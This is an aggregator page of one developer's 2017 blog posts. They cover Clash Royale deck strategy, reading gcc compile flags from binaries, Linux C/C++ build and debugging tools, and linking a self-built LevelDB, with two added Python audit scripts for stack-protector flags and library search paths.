Planet ITRS

December 01, 2017

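Clash Royale: reaching 4900 (Master League I) with 3/0/10/12 (13)

In July I reached 4900 with 0/0/9/12, and in August I got there again after my Battle Ram reached level 10. After that it got harder: the overall pace of card upgrades was too fast. In September, getting Three Musketeers to level 10 was not enough to get back up. In October my Zap reached level 12 and my Elixir Collector level 9, but it was harder still: at 4600+ almost every Hog Rider came with a level 13 Zap, which one-shots a level 12 Goblin Gang and is very hard to defend.

This month I made up my mind to upgrade Goblin Gang to level 13, then switched to another Three Musketeers + Battle Ram deck with slightly lower card levels but more flexibility, and finally made it to 4900 again. Quite a few of the last matches were comebacks from a losing position.

Replays of the last and second-to-last matches: I was fully focused, constantly counting and guessing cards, and in both I managed to find an opening, push through in one wave and turn the game around.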

by fcamel (noreply@blogger.com) at December 01, 2017 02:08 PM

November 27, 2017

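Clash Royale challenge 12-win record

A record of the decks I have played. I have forgotten everything I used before; I must have used Golem decks quite a few times. Unless stated otherwise, everything below is from the Classic Challenge.

Bandit + Miner low-cost Three Musketeers (2017-11)

Drop the Battle Ram for Bandit and add the 2-elixir Goblins and Bats: not only is the attack tempo fast, the Elixir Collector also cycles back quickly. Attacking is no problem, but I am not good at defending; I often do not know how to play after going 1:0 up, and then get turned around. Sometimes I should stop forcing the tempo and settle down to play Three Musketeers, but I still cannot judge the timing well.

In the last three matches of the 12-win run, my opponents' best win counts were 17, 13 and 16, so all of them knew how to play. In the third-to-last match I noticed the opponent was playing Ice Wizard X-Bow before they placed the X-Bow, so I did not plant a second Elixir Collector; otherwise I would have collapsed. In the last match, after seeing Princess, Hog Rider and Mini P.E.K.K.A, I realized it was a Mini P.E.K.K.A Hog deck with Rocket, so I paid attention to where I placed the Elixir Collector and Three Musketeers and did not give up Rocket value. Keeping an eye on recent meta decks helps a lot in reaching 12 wins.

Mega Knight + Inferno Dragon + Bandit + Poison Miner (2017-10)

I have been playing Mario Kart 8 Deluxe more lately, so I have played this less. I saw 瘋蛙 using this deck and it looked fun; I had never practiced a Poison Miner chip deck before, so I gave it a try. I finally cleared it on the fourth attempt; the runs were 8:3, 10:3, 10:3 and 12:1.

Mega Knight and Goblins have a big advantage against Hog Rider, Mega Knight also counters X-Bow and Mortar, Poison Miner is strong against the currently popular Knight + Goblin Barrel decks, and Poison also counters this version's Graveyard, so the deck has an edge in the current environment; the baseline is about half, I would say. Against another Poison Miner deck it is 50/50 and comes down to familiarity. Against Giant, alternate Inferno Dragon / Goblins / Bats on defense, then counter-push with Miner, which is hard for the opponent to defend.

It is very weak to Balloon; if the opponent has Mega Minion it is also hard to break through, and hard to defend when it comes over. In one match a beginner had Balloon and Mega Minion and I won on experience; in one I met Three Musketeers with Mega Minion, made too many mistakes and lost; in the last match I met an expert with an 18-win record playing Mega Knight Balloon, but they made too many mistakes and I ended up winning.

I do not like waiting for the opponent to play first, so I play a card whenever I can. The best opening is Bandit at the back, otherwise Goblins or Bats. Once I cycled Zap and the opponent came with Lava Hound plus Inferno Dragon, and I collapsed straight away. Poison has to be saved for the Electro Wizard behind a P.E.K.K.A, for Graveyard or for Mega Minion, so it cannot be played casually. Mega Knight costs too much and is for counter-attacking, and if I play Miner and the opponent answers with an Elixir Collector it is awkward too, so there are not many opening options. On the counter-attack, though, Miner and Bandit can rush the same lane or split lanes, or Mega Knight or Inferno Dragon can be added as the tank; the attacking combinations are very strong.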

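Giant + Mega Knight + Electro Wizard + Bandit + Mega Minion (2017-08)

I had just got Mega Knight from the Mega Knight challenge, so I hurried to play it. It probably will not be nerfed as quickly as Night Witch was, but playing it early still has some advantage.

I copied this deck from the ladder top 10; for a while lots of people used it. Its attack is fierce: Mega Knight works well behind the Giant, or as a tank on its own for defending and counter-attacking. Most of the time, though, the Giant is still the tank, followed by two of Electro Wizard / Mega Minion / Bandit, which is better value.

Against Golem or P.E.K.K.A it is at a disadvantage and can only switch lanes. It cannot defend LavaLoon either and again has to switch lanes; but LavaLoon cannot defend this deck either, so that is better than meeting P.E.K.K.A. It only has a chance of breaking through when the Giant is at full health with Electro Wizard and Mega Minion behind it and the opponent has only P.E.K.K.A. So although both Mega Knight and Electro Wizard can defend Hog Rider (Mega Knight can even do it without taking damage!), it is still at a disadvantage against P.E.K.K.A Hog. It has the advantage against all other Giant variants; in most cases, once Mega Knight lands, the opponent's whole back line is gone. A Giant deck with lots of air units in the back line is about 50/50; as long as I hold Poison for defense, the opponent cannot break in either. It has the advantage against the other ground decks (fast-cycle Hog, Battle Ram Bandit, Poison Miner): Mega Knight clears everything and the counter-push is very profitable; when I cannot break through I place an Elixir Collector, and the opponent still has to spend elixir on the Mega Knight, which is also good value. The weakness is probably that if the first five cards contain neither Giant nor Elixir Collector, the hand is clunky: whatever I play wastes elixir, so I can only wait for the opponent to play first.

Three Musketeers + Battle Ram + Ice Golem + Miner + Night Witch (2017-08, Legendary Challenge)

A few days ago I watched 水水, the Asia Cup runner-up, play this deck in the Douyu streamers' league, and he was amazing with it. I thought I would use it for the Legendary Challenge. Although Night Witch was nerfed just today (8/11), she is still good when there is an Ice Golem or Battle Ram tanking in front.

After defending with Ice Golem and Night Witch I can counter-push a little to make the opponent keep spending elixir. With enough elixir I add a Battle Ram, which has a good chance of hitting the tower; even if it does not, together with the Bats behind it the damage is considerable, and a Miner can be added at the right moment, so the attack stacks well. It is powerful even without playing Three Musketeers. But Ice Golem is also a Rare, and leveling three Rares is too demanding; Night Witch and Miner are Legendaries, so it is not a good deck for climbing the ladder.

P.E.K.K.A + Executioner + Tornado + Hog Rider (or Battle Ram) (2017-07)

I saw 帽子一隻 use this in the Grand Challenge and thought I would practice it. I used Hog Rider for the first half; midway I played 2v2 and swapped the Hog Rider for Battle Ram (my Hog is level 8, my Ram level 9) and was too lazy to swap back. I just played a match or two whenever I thought of it, and unexpectedly got to 12 wins despite losing two matches very early on.

This deck is a hard counter to Three Musketeers Battle Ram: P.E.K.K.A, or Executioner with Tornado, can take out the Battle Ram and what follows it (one Musketeer / two Musketeers / Mega Minion / Night Witch / Bandit, etc.) without damage. Lightning can be used freely on the Elixir Collector or to support attacks during double elixir. It can cope with all kinds of decks; the weakness is that the hand gets stuck easily. With any four of "three spells, Executioner, P.E.K.K.A" in hand there is nothing I can play; when holding Goblin Gang I should not play it carelessly either, or I will be forced to use Executioner to answer and will not have Executioner when I really need it. When there is no good card to play, I have to hold back and not play anything.

Three Musketeers Battle Ram (Ice Golem, Bandit, Night Witch) (2017-06)

I wanted to practice Giant but kept losing (reasonable enough), so in a fit of anger I played the Three Musketeers Battle Ram archetype I had never used, and unexpectedly went 12 wins, 0 losses. I ran into this deck earlier in the Grand Challenge; it is a strong counter to the previous deck, P.E.K.K.A Battle Ram (Ice Golem and Night Witch can stop the Battle Ram and the Dart Goblin behind it, then counter-push. If they add Goblin Gang, I add Zap, giving that deck no chance to break in. Bank the elixir advantage, place an Elixir Collector, then attack with split Musketeers). This deck only became popular some time after the Night Witch nerf.

I feel I probably cannot get away from Three Musketeers Battle Ram; I just cannot get the rhythm of playing Giant...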

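P.E.K.K.A Battle Ram (Baby Dragon, Tornado, Dart Goblin) (2017-06)

Playing the Grand Challenge with Three Musketeers Battle Ram, I kept running into this deck and getting crushed, so I decided to try it myself. It really does have the advantage against Three Musketeers. A Battle Ram hitting an Inferno Tower is a positive elixir trade and also wears down the opponent's Inferno Tower for the P.E.K.K.A, which is why the two are often paired. Dart Goblin only became popular recently, perhaps because The Log was nerfed and it became more usable? After attacking with Battle Ram and Baby Dragon, add a Dart Goblin in the back line as the situation allows; with a damaged Baby Dragon in front of it, it can deal quite a lot of damage.

Three Musketeers Battle Ram (Electro Wizard + Skeletons + Goblin Gang) (2017-06)

A while ago I lost badly practicing other decks, so I went back to a more familiar combination to regain some confidence Orz. In this version both Skeletons and Goblin Gang were nerfed, but the defensive core of this combination is Electro Wizard, and I do not feel the overall strength has dropped. On the basic Three Musketeers Battle Ram shell, the supporting cards are roughly three out of Skeletons, Goblin Gang, Electro Wizard and Minion Horde; all work well.

P.E.K.K.A and his Legendary friends (2017-06)

I do not think I had reached 12 wins with P.E.K.K.A before? With strong Legendary partners, and without meeting Poison Graveyard, I happened to get 12 wins. The last match was super tense and fairly exciting. Btw, my recent takeaway from playing Royal Giant and P.E.K.K.A: such high-cost core cards should not be played before double elixir, otherwise the elixir cannot keep up, the card cycle cannot be fixed, and everything collapses. I had the same feeling with Three Musketeers and Golem; I do not know whether Lava Hound is the same.

Royal Giant + Miner, Princess, Zap + Executioner, Tornado + Ice Golem (2017-06)

Royal Giant is an awkward card: not tanky enough, not fast enough, and quite weak in challenges. With Night Witch currently OP, I wondered whether Night Witch could help Royal Giant get 12 wins. I tried many combinations and only got to around 8 ~ 10 wins. A few of the ones I tried:

  • Electro Wizard, Skeletons, Ice Spirit + Lightning, Zap + Executioner, Tornado.
  • Mirror, Night Witch + Executioner, Tornado + Miner, Zap + Skeletons

Even a pile of OP combinations plus Royal Giant did not work, though my skill is not good enough either. In the end I cleared it with this deck. If luck accounts for 50% when clearing with other decks, this time it was over 70%: I met the strong Mirror + Clone Witch deck (which this deck happens to counter) but never met Poison Graveyard. I did include defensive cards against Poison Graveyard and LavaLoon, but not meeting them is still better.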

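Mirror Night Witch, Princess, Battle Ram (2017-06)

Fairly brainless to play, and it three-crowns easily (six three-crown games). The Mirror is almost always used on Night Witch, occasionally on Battle Ram, Princess or Goblin Gang. If the opponent places an Elixir Collector, attack with Battle Ram + Miner + Zap, which also takes out the collector; if the opponent does not attack, play Princess or Night Witch at the back; with neither in hand, send a token Battle Ram attack and then play Night Witch at the back to clean up. Try to play Night Witch only when Mirror is in hand, and do not rush to push: wait for full elixir at the back and then play the higher-level Night Witch. If the opponent simply will not attack, add a Battle Ram at the bridge. Overall, do not rush the attack; focus on fixing the card cycle and repeatedly playing Night Witch and mirrored Night Witch, and push when there is a chance.

Poison Graveyard (Baby Dragon, Executioner, Tornado, Knight, Night Witch, Electro Wizard) (2017-06)

Probably the most OP archetype since Night Witch came out. It crushes LavaLoon, Hog Rider and the "fans" deck (粉絲套), and also has good odds against other Night Witch decks; for example, it crushes Mirror Clone Night Witch. I got so annoyed running into this deck that I decided to play it myself and look for weaknesses. I got 12 wins on the first try with only one loss, and that was to Executioner Graveyard through a string of my own mistakes.

Clone Giant Skeleton (2017-06)

Found on PTT; a super fun deck. Following the original poster's suggested substitutions, I tried a few matches and then, from 4:2 with this combination, luckily scraped through 8 narrow wins in a row. My hands were shaking afterwards.

Battle Ram Poison Graveyard with five Legendaries (2017-05, 06)

I bought Bandit and wanted to play Night Witch and Bandit together; I also like the Miner Battle Ram archetype, and putting it all together made a five-Legendary deck XD. It works surprisingly well: the offense is varied and it is hard for the opponent to defend every kind of attack. Switching lanes and going all in (there are lots of all-in combinations XD), or defending and counter-pushing with Battle Ram or Graveyard, both work. My own defense has many problems too, though, and in most cases it becomes a base race. At these card levels it can hold 4100 on ladder at season end, and still has a chance against level 12 and 13 cards. It is also good for 2 vs 2 clan battles, with a high win rate. With me on this deck and TJ on the next deck below, we once won 5 clan battles in a row.

Btw, this deck is so much fun that I got 12 wins three times with it (the third time I accidentally used another deck in match 10).

Giant Night Witch (2017-05)

After getting Night Witch from the Night Witch draft challenge for 500 gems, I saw someone on PTT say this deck (with Ice Wizard replaced by Skeletons) has a high win rate. Trying it, I lost easily when the opponent had Night Witch, so I used Ice Wizard instead of Skeletons to defend against Night Witch. Apart from the super troll Mirror Clone Night Witch deck, I still have a chance against everything.

Idol deck (偶像套) (2017-03?~05?)

The idol deck with the highest average elixir cost; very stress-relieving to play XD, though reaching 12 wins still takes serious thought. When things go well the opponent cannot defend at all, but once slightly behind on elixir, with no cheap cards to gain elixir back, it is hard to recover.

Three Musketeers Battle Ram (Electro Wizard + two 1-elixir cards) (2017-03?~05?)

I saw world champion 嗚聖 play this to great effect and jumped on the bandwagon. Without a level gap, Electro Wizard with Skeletons and Ice Spirit is really strong: good on offense and defense, and it cycles quickly, which eases a bad card order.

Three Musketeers Battle Ram (2017-03?~05?)

This one is half my own design. I had used Battle Ram for a long time and felt it lacked punch. Later I saw someone pair it with Three Musketeers to good effect, so I put together a deck suited to long-term development for climbing the ladder.

To test whether the deck was balanced, I played challenges with it. Not long after, Three Musketeers Battle Ram became a popular archetype with all kinds of variants, and naturally other people used this one too.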

by fcamel (noreply@blogger.com) at November 27, 2017 01:53 PM

September 03, 2017

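Reading back the gcc/g++ compile options from a binary

I picked this up here; the official documentation says -grecord-gcc-switches is on by default, so it is fairly reliable.

Example: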


$ g++ f.cpp -std=c++11 -g -o f
$ readelf --debug-dump f | grep DW_AT_producer
DW_AT_producer : (indirect string, offset: 0xded): \
GNU C++11 5.4.0 20160609 -mtune=generic -march=x86-64 -g -std=c++11 -fstack-protector-strong
DW_AT_producer DW_FORM_strp

But a binary built with clang does not record the full information:


$ clang++ f.cpp -std=c++11 -g -o f
$ readelf --debug-dump f | grep DW_AT_producer
DW_AT_producer : \
(indirect string, offset: 0x0): clang version 3.8.0-2ubuntu4 (tags/RELEASE_380/final)
DW_AT_producer DW_FORM_strp
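
The recorded switches are useful for checking how a binary was hardened at build time. The following is an added example (not code from the original post): it parses DW_AT_producer lines in the format shown above and reports the stack-protector setting per compilation unit, treating a producer with no recorded switches (the clang case) as unknown rather than unprotected. The sample text and the function names are constructed for illustration.

```python
import re

# Constructed sample in the format of `readelf --debug-dump=info`, modelled on
# the two outputs above plus one made-up unit built with -fno-stack-protector.
SAMPLE_READELF = """\
    <c>   DW_AT_producer    : (indirect string, offset: 0xded): GNU C++11 5.4.0 20160609 -mtune=generic -march=x86-64 -g -std=c++11 -fstack-protector-strong
    <c>   DW_AT_producer    : (indirect string, offset: 0x0): clang version 3.8.0-2ubuntu4 (tags/RELEASE_380/final)
    <c>   DW_AT_producer    : (indirect string, offset: 0x1f0): GNU C11 5.4.0 20160609 -mtune=generic -march=x86-64 -g -O2 -fstack-protector-strong -fno-stack-protector
"""

# The abbreviation-table line "DW_AT_producer DW_FORM_strp" has no colon and
# is therefore skipped by this pattern.
PRODUCER_RE = re.compile(
    r"DW_AT_producer\s*:\s*(?:\(indirect string, offset: 0x[0-9a-fA-F]+\):\s*)?(.+)$",
    re.MULTILINE,
)


def parse_producers(readelf_text):
    """Return one {'compiler', 'flags'} dict per DW_AT_producer attribute."""
    # Re-join lines that were wrapped with a trailing backslash, as in the post.
    joined = readelf_text.replace("\\\n", " ")
    units = []
    for match in PRODUCER_RE.finditer(joined):
        tokens = match.group(1).split()
        # Everything before the first "-..." token is the compiler identification.
        first_flag = next(
            (i for i, tok in enumerate(tokens) if tok.startswith("-")), len(tokens)
        )
        units.append(
            {"compiler": " ".join(tokens[:first_flag]), "flags": tokens[first_flag:]}
        )
    return units


def stack_protector_state(unit):
    """Classify one unit: the last stack-protector switch on the line wins."""
    if not unit["flags"]:
        return "unknown"  # producer recorded no switches at all (clang above)
    state = "absent"      # switches were recorded, but none about the protector
    for flag in unit["flags"]:
        if flag == "-fno-stack-protector":
            state = "disabled"
        elif flag.startswith("-fstack-protector"):
            state = flag[len("-f"):]  # e.g. "stack-protector-strong"
    return state


def audit(readelf_text):
    """Return [(compiler, state)] for every compilation unit found."""
    return [(u["compiler"], stack_protector_state(u)) for u in parse_producers(readelf_text)]


if __name__ == "__main__":
    for compiler, state in audit(SAMPLE_READELF):
        print(f"{state:24} {compiler}")
```

On a real binary, feed it the output of `readelf --debug-dump=info`; a stripped binary has no DW_AT_producer at all, so an empty result says nothing about how it was built.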

by fcamel (noreply@blogger.com) at September 03, 2017 04:46 AM

July 02, 2017

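Clash Royale: reaching 4900 (Master League I) with 0/0/9/12

I saw a PTT user reach 4900 with Three Musketeers Hog Rider Knight at 0/0/9/12 and thought there might be hope this season. I tried a push with the same deck (Hog Rider swapped for Battle Ram, so "Three Musketeers, Battle Ram, Knight, Skeletons, Ice Spirit, Goblin Gang"). When I was one win away, I got hit by a level 10 Fireball and then collapsed all the way down.

Later I switched to this set with Ice Spirit, Goblin Gang and Mega Minion:

This way, when the opponent Fireballs the two Musketeers, I can counter-attack with Mega Minion, which makes it harder for them to commit (although in practice opponents still just threw it down...).

Finally, after Knight and Ice Spirit also reached level 12, I made it up. Although I prefer Miner, in practice Knight felt more stable than Miner for climbing: first, Knight is easy to upgrade; second, Knight makes it easier to organize a complete push, whereas Miner is about seizing the moment, allowing surprise attacks but being weak on defense and awkward for defending and counter-attacking.

For the final push I made a point of getting a full night's sleep first so as to be in top condition. In this game the gap between playing in good and bad condition is huge. In bad condition I forget to track the opponent's card cycle, miscount elixir, or do not think about how to organize an attack or defend efficiently. It takes full concentration to scrape out wins against higher levels. Luck, and whether the system feels like messing with you, also matter a lot.

Video of the final win, coming back from a losing position with one counter-push:

Battle log:

With this, the only thing left is 12 wins in the Grand Challenge, and then I will have no regrets in this game. Currently with this deck I can reach 10 wins when in good form (many of them narrow), then I run out of steam at the end and go on a losing streak.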

by fcamel (noreply@blogger.com) at July 02, 2017 05:56 AM

May 30, 2017

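Clash Royale: 4600 trophies with level 11 cards

I cannot believe I have been playing this game for over a year; COC, which I played for more than a year before that, I no longer play (I started COC shortly after getting married).

Card level inflation is severe. Last year at 3000 trophies there were still level 6 Rares, which feels nostalgic. Now everyone treats 4000 trophies as the baseline, level 12 cards are everywhere, and level 13 Royal Giants and Elite Barbarians are not rare either. Reaching 4600 with level 11 cards is worth commemorating.

Btw, after Three Musketeers reached level 9 I got to 4300 quite smoothly; it made a real difference. After Battle Ram reached level 9, I reached 4600 at season end, when it is easier. Upgrading a core card by one level is quite noticeable.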

by fcamel (noreply@blogger.com) at May 30, 2017 02:08 PM

April 29, 2017

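A beginner's guide to C/C++ development on Linux

When you join a new project, the first challenge is building and running it correctly; the popularity of "It works on my machine" shows how hard that is. Next comes reading the code related to your work. Exploiting language features, applying high-level design patterns and so on only come into play when starting a new project or once you know the ground.

I spent the past few years happily immersed in scripting languages and new projects and had never stepped into this cruel world. This post records the skills you may need in that situation and sums up what I learned over the past month or so; all of it hard-won ...

System tools

Getting familiar with the operating system's package tools comes first, so that you know how to get the headers and libraries you need, or how to install the debug-symbol build of a library to inspect or debug the program in gdb. See "Building a package with debug symbols yourself" for the package naming rules on Ubuntu/Debian.

For packages that are not installed, use

  • aptitude search SUBSTRING # find packages
  • aptitude show PACKAGE # show what a package is for
  • apt-file search X # find which package contains X; very useful when looking for headers.

Note that you must run sudo apt-file update before using apt-file, otherwise the search returns nothing.

For installed packages, use

  • dpkg --search SUBSTRING # find which package installed a file; when the header is known, good for finding the library
  • dpkg -L PACKAGE # list a package's contents; useful for finding headers and libraries
  • locate SUBSTRING # I mostly use it to find where a header is, then read the header

Remember to run sudo updatedb before locate, for the same reason as with apt-file.

"Debugging tip: finding third-party library source code on Ubuntu" uses a small example to show how to use these tools to find source code to help with debugging.

Other references: How To Manage Packages Using apt-get, apt-cache, apt-file and dpkg Commands ( With 13 Practical Examples )

Compiling

Linking

This part had me stuck for a while. Some basic notes:

Running

Just reading the code is like looking for a needle in a haystack and not very efficient. Use dynamic execution to find the main execution paths, then focus on the relevant code.

1. strace and ltrace

strace is a powerful tool for analyzing runtime behavior. Google turns up many people's case write-ups; read a few, try it yourself and you will pick it up quickly, though I do not know how much of its capability I am using. Two small cases of my own:

ltrace, on the other hand, I have never found the occasion to use, nor a good case write-up.

2. gdb

gdb's importance needs no explanation. A few earlier notes:

I strongly recommend cgdb: easy to install and painless to pick up, it instantly saves a lot of time operating gdb and reading code.

3. Turn on debugging features

Developers being what they are, they always leave a back door to make their own debugging easier; starting from that angle can also save a lot of time:

4. Loading libraries

Beyond the above, I also looked for static and dynamic analysis tools that draw program flow, such as call graph tools or cflow for C. But static analysis results for C++ were poor, so I did not spend much time on them. For now strace and gdb feel sufficient; I do not know whether generating call graphs, class dependency graphs or the like with tools would help more. I will try when I need to look at a program as a whole.

Reading code

After hearing everyone's suggestions I tried things hands-on and have some notes:

Eclipse CDT is convenient, but I ended up mostly using gj. A few reasons:

  • I am already used to working in vim + screen, and gj fits that best
  • id-utils is really super fast
  • I have updated gj many times for my own needs, and it gets smoother the more I use it

ack is also handy; when I cannot be bothered to build an index or want substring matching, I use it directly. id-utils supports substring matching too, of course; I just have not bothered to change gj for it yet, since most of my needs are finding complete symbols.

Getting familiar with Linux system programming

Once the basic tools are in hand, I plan to set aside a little time each day to read up on related knowledge. After a year or two that should add up. I currently plan to read "The Linux Programming Interface" and will see how it goes over the New Year holiday.

This month's learning was mostly about /proc, which helps a lot for observing CPU usage, RAM usage, which libraries are loaded, multi-threading, process state and so on:

Conclusion

Even if you roughly know what exists, you need hands-on experience to really learn it. I improved a lot in a month, but for the battles ahead there is still a long way to catch up and a great deal to learn.

2012-01-29 update

Added some links written later. Also, "The Linux Programming Interface" is very practical; reading ch1 ~ 3 filled in a lot of basics for me. ch41 and 42 on shared libraries are also well worth reading. For notes, see "Reading notes on The Linux Programming Interface".

2013-07-13 update

Notes on performance analysis tools:

Source: Linux Performance Analysis and Tools

2013-07-20 update

I extracted the second half into a separate, more complete article: "Techniques for understanding the behavior of C/C++ programs".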

by fcamel (noreply@blogger.com) at April 29, 2017 05:00 PM

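(C/C++) How to use a self-built third-party library on Linux

Using LevelDB as the example.

Download and build the files; for how to build, see the instructions shipped with the third-party library: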

$ ls include/  # header files
leveldb/
$ ls out-shared/libleveldb.so* # shared library
out-shared/libleveldb.so@ out-shared/libleveldb.so.1@ out-shared/libleveldb.so.1.20*

The examples below compile with clang++; the options used here are the same as for g++.

Problem 1: header not found

$ clang++ sample.cpp
sample.cpp:5:10: fatal error: 'leveldb/db.h' file not found
#include "leveldb/db.h"
^
1 error generated.

Fix: use -I to specify the header location

Problem 2: shared library not found

$ clang++ sample.cpp -I include/
/tmp/sample-2e7dd8.o: In function `main':
sample.cpp:(.text+0x1e): undefined reference to `leveldb::Options::Options()'
sample.cpp:(.text+0x6f): undefined reference to `leveldb::DB::Open(leveldb::Options const&, std::string const&, leveldb::DB**)'
sample.cpp:(.text+0x10c): undefined reference to `leveldb::Status::ToString() const'
sample.cpp:(.text+0x7d0): undefined reference to `leveldb::Status::ToString() const'
clang: error: linker command failed with exit code 1 (use -v to see invocation)

Ask the linker to link libleveldb.so (linker options are passed through by clang++ / g++):

$ clang++ sample.cpp -I include/ -l leveldb
/usr/bin/ld: cannot find -lleveldb
clang: error: linker command failed with exit code 1 (use -v to see invocation)

But the compiler says it cannot find the library to link.

Add the location of libleveldb:

$ clang++ sample.cpp -I include/ -l leveldb -L out-shared/

Problem 3: shared library not found at run time

$ ./a.out
./a.out: error while loading shared libraries: libleveldb.so.1: cannot open shared object file: No such file or directory

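Producing an executable file or shared library means the static linker succeeded, but at run time the dynamic linker is used to load the libraries. This error message is reported by the dynamic linker.

ldd can check whether the shared library path resolves correctly: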

$ ldd a.out | grep leveldb
libleveldb.so.1 => not found

Several fixes:

1. Specify the location with LD_LIBRARY_PATH (see man ld.so for details)

$ LD_LIBRARY_PATH=`pwd`/out-shared ./a.out

If the location of out-shared is fixed, you can add this to ~/.bashrc

export LD_LIBRARY_PATH=/path/to/out-shared 

2. Write the library path into the executable (see man ld.so for details):

$ clang++ sample.cpp -I include/ -l leveldb -L out-shared/ -Wl,-rpath,`pwd`/out-shared 
$ objdump -p a.out | grep PATH # confirm it was recorded
RPATH /home/fcamel/dev/study/leveldb/out-shared
$ ldd a.out | grep leveldb # ldd can also confirm it
libleveldb.so.1 => /home/fcamel/dev/study/leveldb/out-shared/libleveldb.so.1 (0x00007fc1f091e000)

Here I use an absolute path to reduce potential problems.

3. Move it into the system library directory

$ ldd a.out  | grep leveldb
libleveldb.so.1 => not found
$ sudo su
$ cp out-shared/libleveldb.so* /usr/lib
$ ldd a.out | grep leveldb
libleveldb.so.1 => /usr/lib/libleveldb.so.1 (0x00007f1717026000)

But this mixes it with the system's own libraries and is hard to maintain. Put it under /usr/local/lib/leveldb/ instead:

$ mkdir /usr/local/lib/leveldb
$ cp --preserve=links out-shared/libleveldb.so* /usr/local/lib/leveldb/
$ echo "/usr/local/lib/leveldb" > /etc/ld.so.conf.d/leveldb.conf
$ ldconfig # Update ldconfig's cache
$ ldd a.out | grep leveldb
libleveldb.so.1 => /usr/local/lib/leveldb/libleveldb.so.1 (0x00007f0314b32000)

From man ldconfig we learn that ldconfig reads /etc/ld.so.conf. The configuration I see on Ubuntu 14.04 is:

$ cat /etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

So create a new file under /etc/ld.so.conf.d/ containing /usr/local/lib/leveldb, then update the ldconfig cache.

References

  1. The Linux Programming Interface ch41: Fundamentals of Shared Libraries
  2. man ld.so
  3. man ldconfig
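
Each of the three fixes above adds directories to the dynamic linker's search path, and whoever can write to such a directory can supply the libleveldb.so.1 that gets loaded. The following is an added example (not code from the original post): it reads `objdump -p` output like that shown above, plus an optional LD_LIBRARY_PATH value, and flags entries that resolve against the current directory, sit under a home or temp tree, or are world-writable. The function names, the second sample and the /home, /tmp, /var/tmp heuristic are assumptions made for this sketch.

```python
import os
import re
import stat

# Constructed samples of `objdump -p a.out`. The first mirrors the RPATH shown
# in the post; the second is a made-up binary with weaker entries.
OBJDUMP_PAGE = """\
Dynamic Section:
  NEEDED               libleveldb.so.1
  NEEDED               libstdc++.so.6
  RPATH                /home/fcamel/dev/study/leveldb/out-shared
"""
OBJDUMP_WEAK = """\
Dynamic Section:
  NEEDED               libleveldb.so.1
  RUNPATH              out-shared::$ORIGIN/../lib:/usr/local/lib/leveldb
"""


def embedded_search_paths(objdump_text):
    """Return [(tag, [entries])] for the RPATH/RUNPATH lines of `objdump -p`."""
    found = []
    for m in re.finditer(r"^\s*(RPATH|RUNPATH)\s+(\S*)\s*$", objdump_text, re.M):
        found.append((m.group(1), m.group(2).split(":")))
    return found


def world_writable(path):
    """True if `path` exists and has the o+w mode bit set."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def classify(entry, writable=world_writable):
    """Classify one search-path element; 'ok' means nothing to report."""
    if entry == "":
        return "cwd"            # empty element: searched as the current directory
    if entry.startswith(("$ORIGIN", "${ORIGIN}")):
        return "origin"         # follows the executable; review the install tree
    if not entry.startswith("/"):
        return "relative"       # resolved against wherever the program is started
    if re.match(r"^/(home|tmp|var/tmp)(/|$)", entry):
        return "user-path"      # heuristic (assumption): build tree or temp dir
    if writable(entry):
        return "world-writable"
    return "ok"


def audit(objdump_text, ld_library_path="", writable=world_writable):
    """Return [(source, entry, verdict)] for every entry that is not 'ok'."""
    sources = embedded_search_paths(objdump_text)
    if ld_library_path:
        sources.append(("LD_LIBRARY_PATH", ld_library_path.split(":")))
    findings = []
    for tag, entries in sources:
        for entry in entries:
            verdict = classify(entry, writable)
            if verdict != "ok":
                findings.append((tag, entry, verdict))
    return findings


if __name__ == "__main__":
    for name, text in (("page", OBJDUMP_PAGE), ("weak", OBJDUMP_WEAK)):
        for tag, entry, verdict in audit(text):
            print(f"{name}: {tag} {entry!r}: {verdict}")
```

The RPATH from the post is reported as a user path: it is fine on the author's own machine, but a binary shipped with it will look for libraries in whatever /home/fcamel/... is on the target system.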

by fcamel (noreply@blogger.com) at April 29, 2017 04:16 PM

March 15, 2017

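2006-10-25 Untitled

I have been rewatching Honey and Clover lately and remembered some thoughts I once wrote down. The original post is gone, but fortunately I could recover it from the Web Archive. I am recording it again here.


Honey and Clover (Honey & Clover) is an anime I like very much. I especially love Takemoto's journey of self-discovery, which begins when he suddenly gets on his bicycle; for Takemoto, though, he only wanted to know "if I keep riding like this, how far can I get?". Just like its unplanned start, the journey with no answer also ends unplanned; the change of heart happens in an instant. Takemoto's confusion, his drive, his growth make me want to get on a bike and ride off in one direction right away, and that is still so after several rewatches; only I am still where I was.

Keep riding until you feel it is enough. Whatever the answer is, that is fine; perhaps there is no answer at all, and it all comes down to "did I truly give it everything?"

Along the way, the master craftsman says this to Takemoto.

I always treat everything too cautiously and lose the drive to go all out, and amid endless deliberation I gradually lose the right to go all out. I can only envy friends who dare to charge ahead, friends with the passion to head straight for their goals. In research, I know I am very interested in certain things, but after four years of dragging through university my understanding of them has not grown much. I hope the master's degree is a beginning, a chance to go deep, and also the last chance.

Resting by the roadside, Takemoto sees a train speed past, the Hokutosei. He recalls a childhood memory and chases the Hokutosei, straight ahead, and when he comes to, he is in mid-air, flying exhilarated off the slope.

I saw the grey-blue sea. I saw the shadows of clouds crossing the road. Pedal, eat, sleep, wake up and pedal again...

And so Takemoto saw the place where the rain ends, saw a bright horizon.

My research topic these days is relieving traffic congestion. The topic is getting clearer, but I still do not feel passion for it; instead, while playing with the web I became interested in Information Retrieval (IR). I do not know whether this is yet another escape, an escape from the trouble of digging deep into one thing; after all, I have never thrown myself wholeheartedly into one problem. I am lost again: should I first finish the topic I have already put time into and that has a clear direction, or jump into a field I know nothing about and am only interested in at the keyword level?

I never noticed... that the door of my own room was... an "Anywhere Door". Just open the door and walk out, and you can get anywhere. ... How foolish. Even a grade-schooler understands this. I understood it too, really, but... before coming here... I just could not see it clearly.

Perhaps, no longer perhaps: now is the time to go all out.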

by fcamel (noreply@blogger.com) at March 15, 2017 04:42 PM

March 10, 2017

fcamel says: Have not used Plurk in a long time; scrolling the timeline with an Apple trackpad is not smooth, it goes too fast

by fcamel at March 10, 2017 04:19 PM

fcamel says: How to find the source file and line number from a C/C++ function name? – fcamel – Medium

by fcamel at March 10, 2017 04:18 PM

March 08, 2017

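Debugging tip: finding third-party library source code on Ubuntu

This post uses a small example to show how to use gdb, locate, apt-file and apt-get to find the cause of a problem. Getting the third-party library's source code reduces the time spent guessing.

Problem

I found that a program exits unexpectedly. But it is not a crash, and there is no core dump to look at.

Using gdb to find out how it exits

First attach gdb to the program and keep using it. When the program exits, gdb shows that it ended by calling exit().

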